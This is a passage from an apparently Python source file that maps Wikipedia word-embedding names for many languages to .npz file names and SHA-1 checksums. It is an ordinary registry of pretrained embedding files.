('wiki.bo.npz', 'b9fe87318428de0a7790de175b5fec80c5af482d'), 'wiki.bpy':\n ('wiki.bpy.npz', '5c7853173d27e2c018c24eca69de8d5f34511b0d'), 'wiki.br':\n ('wiki.br.npz', '7aa66a2034fbfaa1d39e637385d48610238797c9'), 'wiki.bs':\n ('wiki.bs.npz', 'a019a4677677c2e9e4d899326b2b6c15ad6c011a'), 'wiki.bug':\n ('wiki.bug.npz', '09ae3477941d7a99d1df494368d7efb0b2c18913'),\n 'wiki.bxr': ('wiki.bxr.npz', 'b832c691b8ddd95896c052d3d15e1f98d72068d5'\n ), 'wiki.ca': ('wiki.ca.npz',\n '391e0d4daad08649251274fa1cc2a5f49c7728b1'), 'wiki.cbk_zam': (\n 'wiki.cbk_zam.npz', '02e57a763bc9f9eadaba57953383dd12a0a78a37'),\n 'wiki.cdo': ('wiki.cdo.npz', 'd6e8f422327e8b2273f1f2662d793707ece6695d'\n ), 'wiki.ceb': ('wiki.ceb.npz',\n '23bc0bb9aeaa57dff35092766941a866de142aae'), 'wiki.ce': ('wiki.ce.npz',\n '182b2a889256119a6d379d501c55c7621e5855db'), 'wiki.ch': ('wiki.ch.npz',\n '82dd77512fcb463481f43c9cef3507e2baa90d7b'), 'wiki.cho': (\n 'wiki.cho.npz', 'b0b620fc2442d1a6e2440e71a424861c80175f0c'), 'wiki.chr':\n ('wiki.chr.npz', '3d62c6b95c5af46abd6234426ae760cca65d5bd0'),\n 'wiki.chy': ('wiki.chy.npz', '34a28a22da79aebc100e3714b825c95c8d5f54a3'\n ), 'wiki.ckb': ('wiki.ckb.npz',\n 'ad19461e4be583d08b7693ff5b1e9d590ed41add'), 'wiki.co': ('wiki.co.npz',\n 'fa60d9f0e79f1c7e15f381aef983a0f4f31c05a8'), 'wiki.crh': (\n 'wiki.crh.npz', '540270ba6edd9d7b2f7efca52b3b407524ac67d1'), 'wiki.cr':\n ('wiki.cr.npz', 'f06b77465a38ec960d7d5a7554b848c37e945c76'), 'wiki.csb':\n ('wiki.csb.npz', 'b8b28559cf2541341af98e2aa755856765bdeabf'), 'wiki.cs':\n ('wiki.cs.npz', '19881e931fe06abf341450f00c342d364313e232'), 'wiki.cu':\n ('wiki.cu.npz', '731e0d00abd53bc2a8eb6cf37f6ab883cff34e15'), 'wiki.cv':\n ('wiki.cv.npz', 'e60034fcffb7dfef7b236ddba1194c3aa20b7967'), 'wiki.cy':\n ('wiki.cy.npz', '5a0fb967b5556f007c0d5065f951a3d3b1c1005a'), 'wiki.da':\n ('wiki.da.npz', 'd06258014ba2c7450bc2d55edfdf1731433e42e5'), 'wiki.de':\n ('wiki.de.npz', 'a21694dfd2af63bd7bb00f0b60b28e88bd1153f1'), 'wiki.diq':\n ('wiki.diq.npz', '4f6c77a86b39834a7130419967759afd8cc26b84'),\n 'wiki.dsb': ('wiki.dsb.npz', 'e74f1d346a8db96987bff0c33ee5f886907c380a'\n ), 'wiki.dv': ('wiki.dv.npz',\n '5d6fe6f0eec2e7704121d5aba03b4edbb28af873'), 'wiki.dz': ('wiki.dz.npz',\n '77c639d36d0355b2de5adead7996eae342b852a6'), 'wiki.ee': ('wiki.ee.npz',\n '4b5a76127d57515d3e8a76787cdefde5856b754a'), 'wiki.el': ('wiki.el.npz',\n 'a00bcb97e7898931196a1c69f7a492e5b6202661'), 'wiki.eml': (\n 'wiki.eml.npz', 'b475d626b3d97e7a68c02827fdc7900599e838c6'), 'wiki.en':\n ('wiki.en.npz', 'ad5ec6d49db6c6fe76b8e85ff05d34e5d0e1eb6a'), 'wiki.eo':\n ('wiki.eo.npz', '18049b0010520d13e676f5a82e8bb90153d99003'), 'wiki.es':\n ('wiki.es.npz', 'a6d192ba7d82d762f8367e75ca951aad4d11e410'), 'wiki.et':\n ('wiki.et.npz', '4beb7025cf88f1aa62d025b187f0cb09aee61858'), 'wiki.eu':\n ('wiki.eu.npz', '5e1a8197e35f20a2476798bbb935b4c131289c4f'), 'wiki.ext':\n ('wiki.ext.npz', '049b2d1b0a8b102b45907cf487cac30aa294e0a0'), 'wiki.fa':\n ('wiki.fa.npz', '81ed274997c87ef87d73d25e166ca06272ce426f'), 'wiki.ff':\n ('wiki.ff.npz', '4867dc74cd53ca0b0f769af4fa1ea420406b59bf'), 'wiki.fi':\n ('wiki.fi.npz', '6d1291b854045179f8171ac7d62ede7d8ac159a2'),\n 'wiki.fiu_vro': ('wiki.fiu_vro.npz',\n 'dd87806d9dc8833fa0e21e35a50815ebdbaa6c8b'), 'wiki.fj': ('wiki.fj.npz',\n 'cf5c31b0a69276f5dd18ab738ed92444abaeb755'), 'wiki.fo': ('wiki.fo.npz',\n 'ffc19807d528af000861a94cfb8097bd686e14fc'), 'wiki.fr': ('wiki.fr.npz',\n '8f06d5dbe3cf7214354fe9b2f6eca0ef7419f063'), 'wiki.frp': (\n 'wiki.frp.npz', 'c8b200ae592478d3cd0bfaafcd7aa19de8a3bfe5'), 'wiki.frr':\n 
('wiki.frr.npz', 'fa5e5c39ea2a45793c679eacea290a35e37405ea'),\n 'wiki.fur': ('wiki.fur.npz', 'a61a8940d059f25000e3fe23933e5ed0d37e65d3'\n ), 'wiki.fy': ('wiki.fy.npz',\n '46f9f41bdf6f4fb8e27a753290413d745465963b'), 'wiki.gag': (\n 'wiki.gag.npz', '49fb01230e6803544122d47ab7d3fe694d1444f2'), 'wiki.gan':\n ('wiki.gan.npz', '716b7b26acc15975f30caf3c6effa111516fcca5'), 'wiki.ga':\n ('wiki.ga.npz', 'ea934bc1fdc1acf6caf9ac746c6c499251f1fdee'), 'wiki.gd':\n ('wiki.gd.npz', '597017b5a32d933f194595d3656f858e37e70a62'), 'wiki.glk':\n ('wiki.glk.npz', '91a5834658bc2d48714e8807ef24efb79567b4b5'), 'wiki.gl':\n ('wiki.gl.npz', '2fa8e48d6ae1e9c9d542eb3f2156cf9e359e66c2'), 'wiki.gn':\n ('wiki.gn.npz', 'e359eef3928e1f1b5d8fcf0ea532e8794c66289a'), 'wiki.gom':\n ('wiki.gom.npz', '8cd361481c23f7545cc2bd8f1bf22aa7400edd4d'),\n 'wiki.got': ('wiki.got.npz', 'd05daf105611150695e61775fdff2c500b36be3f'\n ), 'wiki.gu': ('wiki.gu.npz',\n '0ce175c5fc39bab4032892f70c9d2bb850af0f4a'), 'wiki.gv': ('wiki.gv.npz',\n '2c573f873d607831ff01b64603c17b8db79bd7e1'), 'wiki.hak': (\n 'wiki.hak.npz', 'e6048727799cdf149f5c50037e0fc59300d33a94'), 'wiki.ha':\n ('wiki.ha.npz', 'f18ea7286bbd390c5470896b2c99cb1adc740064'), 'wiki.haw':\n ('wiki.haw.npz', '18bcd85d2e06b1b889f0835fc5b62697fdf32d72'), 'wiki.he':\n ('wiki.he.npz', '76915ff167b6ecb7b7e22ff0ca46914a55d344af'), 'wiki.hif':\n ('wiki.hif.npz', '12153aaf98d76d5502ab77a27cd0b9a539f61513'), 'wiki.hi':\n ('wiki.hi.npz', '249666a598991f6ec147954c6af9e531fd1cd94e'), 'wiki.ho':\n ('wiki.ho.npz', '3f804fd69780c0789708b56ea9d48715f8e38f26'), 'wiki.hr':\n ('wiki.hr.npz', '9a3de28e69f97048bfb480b4f83eaab6149f66ad'), 'wiki.hsb':\n ('wiki.hsb.npz', '7070bf64e13299dd66ac0e9f8e24011a56b6bfe8'), 'wiki.ht':\n ('wiki.ht.npz', 'a607093d511afeb584d02dc676bc5a27eff66287'), 'wiki.hu':\n ('wiki.hu.npz', '9b2c4750daf1bcf39768572e874b5afda0e2f0bc'), 'wiki.hy':\n ('wiki.hy.npz', 'ec0461a102a6fb00bd324f66cefd3c8d55a7093a'), 'wiki.hz':\n ('wiki.hz.npz', '5dfb8afbdae6b4148c3e55ab459c56a74b46b463'), 'wiki.ia':\n ('wiki.ia.npz', '4cfaaf053b9513bbf5b2423258c0f01d20256de6'), 'wiki.id':\n ('wiki.id.npz', 'bace396bb9941cc9e5b2e5f5a19be6db833c5fd4'), 'wiki.ie':\n ('wiki.ie.npz', '1bae7256c2e763ce6d692d1c0a603d99a8b22826'), 'wiki.ig':\n ('wiki.ig.npz', '23128e54a5e143891d392d621723bad9cfc8cf7b'), 'wiki.ii':\n ('wiki.ii.npz', '54bc16d05da512481865a89ecf30260b0acc04dc'), 'wiki.ik':\n ('wiki.ik.npz', 'f8015227e893d2375699b7d132b306ba381f02ac'), 'wiki.ilo':\n ('wiki.ilo.npz', '185a11f81bd5d24a34558dda81ee4735f5ba150b'), 'wiki.io':\n ('wiki.io.npz', 'ddf8180a90aa6ee5be93a2582cc99c535f21363e'), 'wiki.is':\n ('wiki.is.npz', '968f8dd2a093b279a6f7aaa734008454bf51d724'), 'wiki.it':\n ('wiki.it.npz', 'fdfb857a309b2c3d29482bb5cc55f21b858d2e6f'), 'wiki.iu':\n ('wiki.iu.npz', 'fa8896730bd6c24c3473daa22116d1016294e7f7'), 'wiki.jam':\n ('wiki.jam.npz', 'a8f0d0b99c89ace0a6401b8fcda261d06065faaf'), 'wiki.ja':\n ('wiki.ja.npz', '8d42e5a40e4d1d8645b2d80b873a65cadcf68b5c'), 'wiki.jbo':\n ('wiki.jbo.npz', '145fc999ab004b348cf9bf445f0a93a7a145308b'), 'wiki.jv':\n ('wiki.jv.npz', '66978770bf06e42414395cf5fd8c596044d72bec'), 'wiki.kaa':\n ('wiki.kaa.npz', '624a640ecb9901b2aba2e9f44ab615146ecb2862'),\n 'wiki.kab': ('wiki.kab.npz', 'e97f93b6ba65e95c85b7541932cf53c5ad9eb896'\n ), 'wiki.ka': ('wiki.ka.npz',\n '1ca8376e1e0cbd58001c1b51a2d488a2874a6743'), 'wiki.kbd': (\n 'wiki.kbd.npz', 'f2d2a05b06723ac549784ad5470d84f5742a1352'), 'wiki.kg':\n ('wiki.kg.npz', 'fa7f6d5f660a173a3e75342d449980eedcdc789e'), 'wiki.ki':\n ('wiki.ki.npz', 
'21a8c7c616c0050c51c288861f3423f313e4f634'), 'wiki.kj':\n ('wiki.kj.npz', 'f3c347509a0d81f4f7fdbb8b22889b8d76e5014e'), 'wiki.kk':\n ('wiki.kk.npz', 'bc24a3289e1c1e18e16b6789c2f9f92af1e73071'), 'wiki.kl':\n ('wiki.kl.npz', 'b8b7e7359f067836e2be2ecfe9f35a820b00fe1d'), 'wiki.km':\n ('wiki.km.npz', 'e053799fd01463808432dc035bef3e36620e2f36'), 'wiki.kn':\n ('wiki.kn.npz', '2849a0a8b3453e9bf6af05d4c7bd3db881dd1068'), 'wiki.koi':\n ('wiki.koi.npz', 'a9b02e9bd41833bcd54769f94626019c03f29997'), 'wiki.ko':\n ('wiki.ko.npz', '764d9896e74b5a26c6884d48bce3bed8ed3a7822'), 'wiki.krc':\n ('wiki.krc.npz', 'bfe39598c718f1cc95909db7544b3214b308a97c'), 'wiki.kr':\n ('wiki.kr.npz', '1e6af853d4a8ea7830e116eb9b61ac5d7d9a315c'), 'wiki.ksh':\n ('wiki.ksh.npz', '66cd0e3e0a0b0282a13960571ebe7cddd7706bf2'), 'wiki.ks':\n ('wiki.ks.npz', '85f1adaa05b854df4dede745a1aaab3836e60770'), 'wiki.ku':\n ('wiki.ku.npz', 'faf90584e5a45e6d0f9eeb88399b82abe037d584'), 'wiki.kv':\n ('wiki.kv.npz', '9f2b41822013a412da9c99fac06eed8be03ca192'), 'wiki.kw':\n ('wiki.kw.npz', '3eed8a8fc97a2fc79241b8474a458c98d00fc897'), 'wiki.ky':\n ('wiki.ky.npz', '0116ff90f10a6c0728e1ea86d8a44896ea83270a'), 'wiki.lad':\n ('wiki.lad.npz', '5af2015b3d1c5e8563f0e92721580988ebe2ce50'), 'wiki.la':\n ('wiki.la.npz', '7143303a3ea13c7668eb90ea6e3d2ca69857a3be'), 'wiki.lbe':\n ('wiki.lbe.npz', 'f206a3c35a184ba5d2b32ee68640eadf66c847da'), 'wiki.lb':\n ('wiki.lb.npz', '143dc6337f3690379282034c460c613d7f144923'), 'wiki.lez':\n ('wiki.lez.npz', 'b29a680decc6b29f24e8eb9e4f8e11e3419d45f1'), 'wiki.lg':\n ('wiki.lg.npz', '866640ce62cedbc1d453b7ea3c289c291ad76e13'), 'wiki.lij':\n ('wiki.lij.npz', '0dcd3d7009ae89b1016ca6cdb99a9f0d70bc4baf'), 'wiki.li':\n ('wiki.li.npz', '4666b3c238256d7b7623a136db19b8b9f4754734'), 'wiki.lmo':\n ('wiki.lmo.npz', 'ac89fa7cfe0675950bcb31c66bf3f88a3cfc98f0'), 'wiki.ln':\n ('wiki.ln.npz', 'fba158719944aabe58e0002a90be0ed77e11702d'), 'wiki.lo':\n ('wiki.lo.npz', '1e113e340a8a93d385e14502c9c4e3bcdf6c3101'), 'wiki.lrc':\n ('wiki.lrc.npz', '42cb755f398fba6f0da7949c91e92b55654bd482'),\n 'wiki.ltg': ('wiki.ltg.npz', '182f75859e228d1162215f28fe7f2dca127624a4'\n ), 'wiki.lt': ('wiki.lt.npz',\n '66aa944bd2e777cb82d6d59b1f2f837b6c48cb37'), 'wiki.lv': ('wiki.lv.npz',\n '2be8f926da85694fa998bf79d80b61ebb8d67576'), 'wiki.mai': (\n 'wiki.mai.npz', 'b8a9c36e2a0f1bb84a44dc762250d2a9007ef637'),\n 'wiki.map_bms': ('wiki.map_bms.npz',\n '6f0394d6b3d08a946e3df4b9355efe94148f018a'), 'wiki.mdf': (\n 'wiki.mdf.npz', '774ee35334641db57f9ac9069961c5372a5d92e8'), 'wiki.mg':\n ('wiki.mg.npz', '496c48ef668f08ce95ebb11ce1ce5026b52d935c'), 'wiki.mh':\n ('wiki.mh.npz', '352edd84f99c5aa277a7306f6cacea1fab065ed3'), 'wiki.mhr':\n ('wiki.mhr.npz', 'dd78b27a674ac10411cdf74ac32f9391506b17e0'),\n 'wiki.min': ('wiki.min.npz', '628b406441ab03bc8aa68195ada50bfdc8226f34'\n ), 'wiki.mi': ('wiki.mi.npz',\n '754127b473861cd4f9ae034c9f527a34827b1f00'), 'wiki.mk': ('wiki.mk.npz',\n 'b09fed4f56c296f13c4020ef1fec498382a38b73'), 'wiki.ml': ('wiki.ml.npz',\n '02fb55d97ca2f0408f0e7e8dd6a661bbc3319a2a'), 'wiki.mn': ('wiki.mn.npz',\n '08b2c45689aa5d9ec49df96dc7c777ce9b9a0b4b'), 'wiki.mo': ('wiki.mo.npz',\n '638c2e8bd2352fd52921b9ae62f578b8357bab49'), 'wiki.mrj': (\n 'wiki.mrj.npz', 'ec5cf1f4fb8dfdca64d8172974e620eb8fa41626'), 'wiki.mr':\n ('wiki.mr.npz', '074dd68c947c2f137a3e84b55012925f00213139'), 'wiki.ms':\n ('wiki.ms.npz', '3dbe9e9d70251de8a374776ff1250a9c3103ee59'), 'wiki.mt':\n ('wiki.mt.npz', 'f5103998a68d1b178387417436a83123d44aba01'),\n 'wiki.multi.ar': ('wiki.multi.ar.npz',\n 
'a010d1d81a465c56ebaf596b3e8e8795e7f0f8e3'), 'wiki.multi.bg': (\n 'wiki.multi.bg.npz', 'c04018f3a600cee170f12a36cdd35b4727a2aade'),\n 'wiki.multi.ca': ('wiki.multi.ca.npz',\n 'eef52a0cf20c133ca9065de25f0702861a8cfa29'), 'wiki.multi.cs': (\n 'wiki.multi.cs.npz', 'c5f547aa78c0e3d7dae67a0334d500bf2a86aa30'),\n 'wiki.multi.da': ('wiki.multi.da.npz',\n '24374f2ee169b33327feeee46da31b0de1622fe4'), 'wiki.multi.de': (\n 'wiki.multi.de.npz', '2e6c119b345bebd34b56eaaf855d6703889b11f7'),\n 'wiki.multi.el': ('wiki.multi.el.npz',\n '9d122beedb80a2e5334946641e5bafd32c01e76b'), 'wiki.multi.en': (\n 'wiki.multi.en.npz', '8c3c480b4cb2690304173713a646280613b244a8'),\n 'wiki.multi.es': ('wiki.multi.es.npz',\n '483a22656e4fb2a01e9f4ef8156b261e780850ab'), 'wiki.multi.et': (\n 'wiki.multi.et.npz', '22498c7b91645a3874fa738b5cfb16bf98b6f97c'),\n 'wiki.multi.fi': ('wiki.multi.fi.npz',\n '765a6f0b63777bff4ae6ca2b461c5889c03d6a70'), 'wiki.multi.fr': (\n 'wiki.multi.fr.npz', 'decd9aacf600114b8a36072535c0309874a37c83'),\n 'wiki.multi.he': ('wiki.multi.he.npz',\n '7eee940c1b85936f59122f4b1a166223dd946674'), 'wiki.multi.hr': (\n 'wiki.multi.hr.npz', '1673963416af088f8bf15576afb33d58115db35c'),\n 'wiki.multi.hu': ('wiki.multi.hu.npz',\n 'a1fbe6ededf3cbaa3eaa22dd8b20cce4b36cfc6d'), 'wiki.multi.id': (\n 'wiki.multi.id.npz', '6c3e721febb511ede7db7bf978d65769e4270f5c'),\n 'wiki.multi.it': ('wiki.multi.it.npz',\n 'fc5bfc11e0165e8d95c1708573dad5e456826c73'), 'wiki.multi.mk': (\n 'wiki.multi.mk.npz', '6cd50198355674f156fc863108d9bebf11cfabd9'),\n 'wiki.multi.nl': ('wiki.multi.nl.npz',\n '4fa06b9230c95dfa5a9e9a5d80f1f5ba614d3cbf'), 'wiki.multi.no': (\n 'wiki.multi.no.npz', '63756168c1101e73fba8d1a5015f32b8892819e6'),\n 'wiki.multi.pl': ('wiki.multi.pl.npz',\n '958b8e8bead965ba1bb1433e1c960fc3e12a10fb'), 'wiki.multi.pt': (\n 'wiki.multi.pt.npz', '22f07df1609d79b95344ee575ea43141424a1528'),\n 'wiki.multi.ro': ('wiki.multi.ro.npz',\n '73180b3e382519004bf38ea7b86237aacbbe813a'), 'wiki.multi.ru': (\n 'wiki.multi.ru.npz', '3b2eb9163f35e90bf2ce1cd3c997b354d0c34f59'),\n 'wiki.multi.sk': ('wiki.multi.sk.npz',\n '606a0c3ba9849070c6b6b8c22d920fdeed9a1385'), 'wiki.multi.sl': (\n 'wiki.multi.sl.npz', '3cfdab5043b8cfe1535cb6dbd4c9e68847ad5904'),\n 'wiki.multi.sv': ('wiki.multi.sv.npz',\n '4f1494885b9a831e87cfa3c15f2204c4a73c0779'), 'wiki.multi.tr': (\n 'wiki.multi.tr.npz', '54f90d5ddb9a65538a41e37c5a67ed933a5e4885'),\n 'wiki.multi.uk': ('wiki.multi.uk.npz',\n '500fd26b1d7a25b42458012e99f9f76642e0c787'), 'wiki.multi.vi': (\n 'wiki.multi.vi.npz', '3955809cceb300965c15f9372221417719bb0db8'),\n 'wiki.mus': ('wiki.mus.npz', 'a5f48934a3fa6eaf4929098046c93fc94dd6bcb6'\n ), 'wiki.mwl': ('wiki.mwl.npz',\n '8a5e2c272166f8a72c5694ca6c3104d5f49179ec'), 'wiki.my': ('wiki.my.npz',\n '5e035aca16700d7d6695af8a6d3a88ac847aaeb7'), 'wiki.myv': (\n 'wiki.myv.npz', 'd4cfaab70c640033e02c0fc0c5a3615ae836c569'), 'wiki.mzn':\n ('wiki.mzn.npz', 'ad09ac584ae455b5862b95125ef409360ae18445'),\n 'wiki.nah': ('wiki.nah.npz', '2dc454ef37d059f2053af46cfa1f4f0ca939cba0'\n ), 'wiki.na': ('wiki.na.npz',\n '401f0f880eb7aa78d21348bc1e0a3953b3e81bf0'), 'wiki.nap': (\n 'wiki.nap.npz', '996da46aeeab5644ba766d00c5e343b1553361d7'),\n 'wiki.nds_nl': ('wiki.nds_nl.npz',\n '5a9307e16b13a5a82ec19a52b33254537e7198e7'), 'wiki.nds': (\n 'wiki.nds.npz', 'b249a87c78c52becf51e7b50aaf9f9b6a36585f1'), 'wiki.ne':\n ('wiki.ne.npz', 'a601db2647a74ffd2b4b43dcb8584735f555459c'), 'wiki.new':\n ('wiki.new.npz', 'c398a3775aba9c68ce765cfdfb6b188f7c47e4c6'),\n 'wiki-news-300d-1M': 
('wiki-news-300d-1M.npz',\n '0a03bbd508e5381e140476140fb121afeb0050ed'),\n 'wiki-news-300d-1M-subword': ('wiki-news-300d-1M-subword.npz',\n '69edae21375407781c727dcb9e534e79d712d137'), 'wiki.ng': ('wiki.ng.npz',\n 'befd774d15f69d43547e13e5ea3a97c4cb1ab405'), 'wiki.nl': ('wiki.nl.npz',\n '5a7cb6f1dd0a7621202abba9461ac2c5bf905219'), 'wiki.nn': ('wiki.nn.npz',\n '8e5059ddeb24050fadaa5cc4622b13feb3e4a226'), 'wiki.no': ('wiki.no.npz',\n '5ce6e0f793e66f081652f64013968099de03d9f9'), 'wiki.nov': (\n 'wiki.nov.npz', '95ed23b4cfd7a65afa1c12c7dbdce6af53923d77'), 'wiki.vec':\n ('wiki.vec.npz', '08ebb912efeb9df1c7d05e1af90484d210dff47e'),\n 'wiki.nrm': ('wiki.nrm.npz', 'e58614b4508ff9810f0b58fd818f973775bc918d'\n ), 'wiki.nso': ('wiki.nso.npz',\n '56a2ebe260241402d117cd89c5c872b9c96ff05b'), 'wiki.nv': ('wiki.nv.npz',\n 'c713051fe03ec1f60314bb42161b2a47fb5e169a'), 'wiki.ny': ('wiki.ny.npz',\n 'ba5a1725955cbc13e7fd93ab499f8085840c992c'), 'wiki.oc': ('wiki.oc.npz',\n '259e7d994c38a4cfc140fb07016b82d6781e5027'), 'wiki.olo': (\n 'wiki.olo.npz', '0fea70f887def4779ee70a79366b88f1ada65004'), 'wiki.om':\n ('wiki.om.npz', '47e2d756b5f8913085d901375c1b4e0b118a4221'), 'wiki.or':\n ('wiki.or.npz', '7e274ab060219b019aa02bb97941cc6e162fd01f'), 'wiki.os':\n ('wiki.os.npz', '19e8199cc2aaffdb07b6c558dbc5465ac6e03155'), 'wiki.pag':\n ('wiki.pag.npz', 'eddf4931547649026c02f893297ef673ec6158bb'),\n 'wiki.pam': ('wiki.pam.npz', '40109aa174bd9f0fa657839bb548e2b0646c58d3'\n ), 'wiki.pa': ('wiki.pa.npz',\n '8a5870717e9e641b1f757f13259171698118de2e'), 'wiki.pap': (\n 'wiki.pap.npz', '999c8e5b005ca20d9998fbbe4fa79177f69e24c0'), 'wiki.pcd':\n ('wiki.pcd.npz', 'e975066b323a65cdc5e4c27138ef674d2cf7250b'),\n 'wiki.pdc': ('wiki.pdc.npz', '5c770b9d56f276b0aa535845f175c05ee1cea615'\n ), 'wiki.pfl': ('wiki.pfl.npz',\n '0063d0b633ee529a75482b36ed4f4da7d64994ec'), 'wiki.pih': (\n 'wiki.pih.npz', 'ce1d76c94d248545eea0d7436c54849dbb380bfc'), 'wiki.pi':\n ('wiki.pi.npz', 'c7d56c334bf529f8b3655693d207a80feaec4aed'), 'wiki.pl':\n ('wiki.pl.npz', '0d612fdf871a1a4084c867f394940475be899443'), 'wiki.pms':\n ('wiki.pms.npz', 'ca149a2fb138011315bb6d5d61c7a5647e515e51'),\n 'wiki.pnb': ('wiki.pnb.npz', '9ec82d02ad8894056c67991cf8ce927bcca74ee2'\n ), 'wiki.pnt': ('wiki.pnt.npz',\n '3f90123407bb8fc838a0a0d3700a14e15f5b26aa'), 'wiki.ps': ('wiki.ps.npz',\n '7edebc02ac16f5fab83eb10b7d0fab821a9a4d43'), 'wiki.pt': ('wiki.pt.npz',\n 'f172fd801edd1ad9d319ba44146d40b5d682a473'), 'wiki.qu': ('wiki.qu.npz',\n '68bec60ccfe1826c3b3a8968574488dbc74cdf7b'), 'wiki.rm': ('wiki.rm.npz',\n '00fb191fc736ba60cb23e76169dfccde9a9daad0'), 'wiki.rmy': (\n 'wiki.rmy.npz', 'c5e93cc37ff7293b9a1d9fe55c42d6fbde372b97'), 'wiki.rn':\n ('wiki.rn.npz', '57b8e0d6999269be227af6ef2797a9cf8386ff1b'),\n 'wiki.roa_rup': ('wiki.roa_rup.npz',\n 'e06d6b5672a59bb9e83143bc8b28300d23c09546'), 'wiki.roa_tara': (\n 'wiki.roa_tara.npz', 'c083105f40236dc3711f06c1b40e8ee7a714b99d'),\n 'wiki.ro': ('wiki.ro.npz', '766bc0cb58a65b0b1763b9a0d90e91ab982eb20d'),\n 'wiki.rue': ('wiki.rue.npz', '9a91fa093cd48d7d658d526b0ccda48dc59cd7f4'\n ), 'wiki.ru': ('wiki.ru.npz',\n 'd59d099481c22d5592ab9635c9ee48060aa0bf45'), 'wiki.rw': ('wiki.rw.npz',\n 'e99ee87d249f6c157c5c97397d1025d798b85c69'), 'wiki.sah': (\n 'wiki.sah.npz', '85dae39097b29bc8e2b64f343a77794e4a62f91a'), 'wiki.sa':\n ('wiki.sa.npz', '7d1928d7c67400045ac1b35a37a0e3089690d875'), 'wiki.scn':\n ('wiki.scn.npz', '27d7b8050bbeed8ce196061c610216760b053c39'), 'wiki.sc':\n ('wiki.sc.npz', '69c7b8be0f03a1bbd615695f93bdd78f96a58e16'), 'wiki.sco':\n 
('wiki.sco.npz', '4880282f59d3338b67fbff75359e2d24896e95bb'), 'wiki.sd':\n ('wiki.sd.npz', '0ed8da4d27223db717a612cf0c88582351db6e19'), 'wiki.se':\n ('wiki.se.npz', '0f4b2e060d5e29f96ca73aab29c967e79db69c17'), 'wiki.sg':\n ('wiki.sg.npz', 'a5e4edf34fe1a88b322da4c3922ec5a470e200c6'), 'wiki.sh':\n ('wiki.sh.npz', 'c13f1e94676bc939560193f7aa7ffd7d604707b3'),\n 'wiki.simple': ('wiki.simple.npz',\n '352d0575e7d60b08e1dfce2c5de713906f0ed78f'), 'wiki.si': ('wiki.si.npz',\n '204f9ffbe7770a9f56d3b2fb26999165015f5c33'), 'wiki.sk': ('wiki.sk.npz',\n '7a9820b5a343b242660bf2595d1ecbf6e00a76d6'), 'wiki.sl': ('wiki.sl.npz',\n '85f3186f26d6725317a64e290363a7251b928b81'), 'wiki.sm': ('wiki.sm.npz',\n '9e13452cc4bff677f4f15db04f9d2f95f6ec054c'), 'wiki.sn': ('wiki.sn.npz',\n 'e8d5f7dcf51280c5f99bc3df849b4889a61e9fcd'), 'wiki.so': ('wiki.so.npz',\n '0f5d71b95768b33fd939a870c15344c4478364a9'), 'wiki.sq': ('wiki.sq.npz',\n '8b05826df8575e65c87a2fc0b7630cf644d4216d'), 'wiki.srn': (\n 'wiki.srn.npz', '2711396ef297ac5dde8904508bc002bdecbcc6f4'), 'wiki.sr':\n ('wiki.sr.npz', '546edc8e29a5d2e99ed10eb4a552cbef2bb8f417'), 'wiki.ss':\n ('wiki.ss.npz', '2e5911bad79bb5270a64f587e326d31c95ec58f3'), 'wiki.st':\n ('wiki.st.npz', '23bc954719a2962e891f02efaea754c9ea025894'), 'wiki.stq':\n ('wiki.stq.npz', 'dd3ece0c0aa30e53ae0f4b558309bb60ab628652'), 'wiki.su':\n ('wiki.su.npz', '7e48732e8a1fcf212e692924a4416a6ac3b3b055'), 'wiki.sv':\n ('wiki.sv.npz', 'b9ec52e9423688f195f3145c243226c0e0b51e83'), 'wiki.sw':\n ('wiki.sw.npz', '5262f0c645322b10eca73f792a970f10b2719e55'), 'wiki.szl':\n ('wiki.szl.npz', 'fdd6d6b291cdbbcec5ff93451a588fdd103bb2d0'), 'wiki.ta':\n ('wiki.ta.npz', 'da7c5bc6e1142306ff2669bf1739832beb6c1763'), 'wiki.tcy':\n ('wiki.tcy.npz', 'baa49e1afa2bb0dcaaef0fac1ee75bbe711d1134'), 'wiki.te':\n ('wiki.te.npz', 'baf48767ce85e4d41d65d25f2bbf1c5f559ec18f'), 'wiki.tet':\n ('wiki.tet.npz', '11e46a893af55344dbe102d530fdfea5d949d3bc'), 'wiki.tg':\n ('wiki.tg.npz', 'da66abb72ec9ccc602713161e544963d59cc51d7'), 'wiki.th':\n ('wiki.th.npz', '25e54bf2d305779ec9baa5f344410bd75c7702fc'), 'wiki.ti':\n ('wiki.ti.npz', '1faf98f3a0eafa7559a4b2a111f43dd1f7b9a05b'), 'wiki.tk':\n ('wiki.tk.npz', '34c714fa8275fd6abfe86b2d144a043774552a6c'), 'wiki.tl':\n ('wiki.tl.npz', '7d7f8a0485155bce7a74a1d778824375b0029f53'), 'wiki.tn':\n ('wiki.tn.npz', 'd0bc3a9b948753ac2283e5e10480c9fa0f6acb53'), 'wiki.to':\n ('wiki.to.npz', 'e982fc31bcfcf7339988d7aad21ce29ac9e84b0b'), 'wiki.tpi':\n ('wiki.tpi.npz', '448cef043fa4b7f97825dbf8ee205ef05543bcac'), 'wiki.tr':\n ('wiki.tr.npz', 'c9830607a4c5134c6191006f1d80bae0ec798fe6'), 'wiki.ts':\n ('wiki.ts.npz', '84a0598803712c8a713943447ddb73fc0f39af43'), 'wiki.tt':\n ('wiki.tt.npz', '82c29df18f33e6284af3e977a6dda7e132a7a225'), 'wiki.tum':\n ('wiki.tum.npz', '358990b894a3fb09d70674465952d828c9b0eda7'), 'wiki.tw':\n ('wiki.tw.npz', '1e6d2838a4f271c1808795fb929cfcbf95094d93'), 'wiki.ty':\n ('wiki.ty.npz', 'e41ca5192d8cb515b3561c8d6935b150deb027b7'), 'wiki.tyv':\n ('wiki.tyv.npz', 'ce062ed32e854604714b65698ae290c99ba28060'),\n 'wiki.udm': ('wiki.udm.npz', '9e1c5891ee0c5ac8f65fc457e1b42c7b2bfc8d37'\n ), 'wiki.ug': ('wiki.ug.npz',\n '656503e54063e200980e39f00fc011395bcd8551'), 'wiki.uk': ('wiki.uk.npz',\n '352b7ee24d9fc6513fff4fe13bc04086c680834a'), 'wiki.ur': ('wiki.ur.npz',\n 'a81e55c7adfc2cef779ce9a01fe21319a7e4943b'), 'wiki.uz': ('wiki.uz.npz',\n 'd60d1e67bb8574dd71c18c88114aba674fc1eecb'), 'wiki.ve': ('wiki.ve.npz',\n '5bfc3dbb3e47d23597df47ef12bd1c64ab8d3ea9'), 'wiki.vep': (\n 'wiki.vep.npz', 
